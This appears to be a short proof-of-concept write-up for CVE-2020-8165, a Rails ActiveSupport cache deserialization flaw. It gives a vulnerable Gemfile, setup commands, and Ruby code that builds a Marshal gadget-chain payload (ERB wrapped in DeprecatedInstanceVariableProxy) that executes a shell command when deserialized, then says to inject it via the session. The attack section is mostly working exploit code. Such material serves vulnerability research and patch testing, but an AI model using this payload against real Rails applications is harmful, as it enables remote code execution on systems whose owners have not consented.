CVE 2020-8165
A flaw was found in rubygem-activesupport. An untrusted user input can be written to the cache store using the raw: true
parameter which can lead to the result being evaluated as a marshaled object instead of plain text. The threat from this vulnerability is to data confidentiality and integrity as well as system availability.
- Build file
Gemfile
source 'https://rubygems.org' git_source(:github) { |repo| "https://github.com/#{repo}.git" } ruby '2.6.3' gem 'rails', '5.2.3' gem 'sqlite3' gem 'puma', '~> 3.11' gem 'redis', '~> 4.0' gem 'tzinfo-data', platforms: [:mingw, :mswin, :x64_mingw, :jruby]
- Get Rails console
bundle install --path vendor/bundle bundle exec rails console
- Build Payload in Rails console
require 'uri' code = '`touch /tmp/rce`' erb = ERB.allocate erb.instance_variable_set :@src, code erb.instance_variable_set :@filename, "1" erb.instance_variable_set :@lineno, 1 puts URI.encode_www_form(payload: Marshal.dump(ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result))
- Find the endpoint and inject the payload
The payload needs to be stored in the session to be deserialized by the session manager.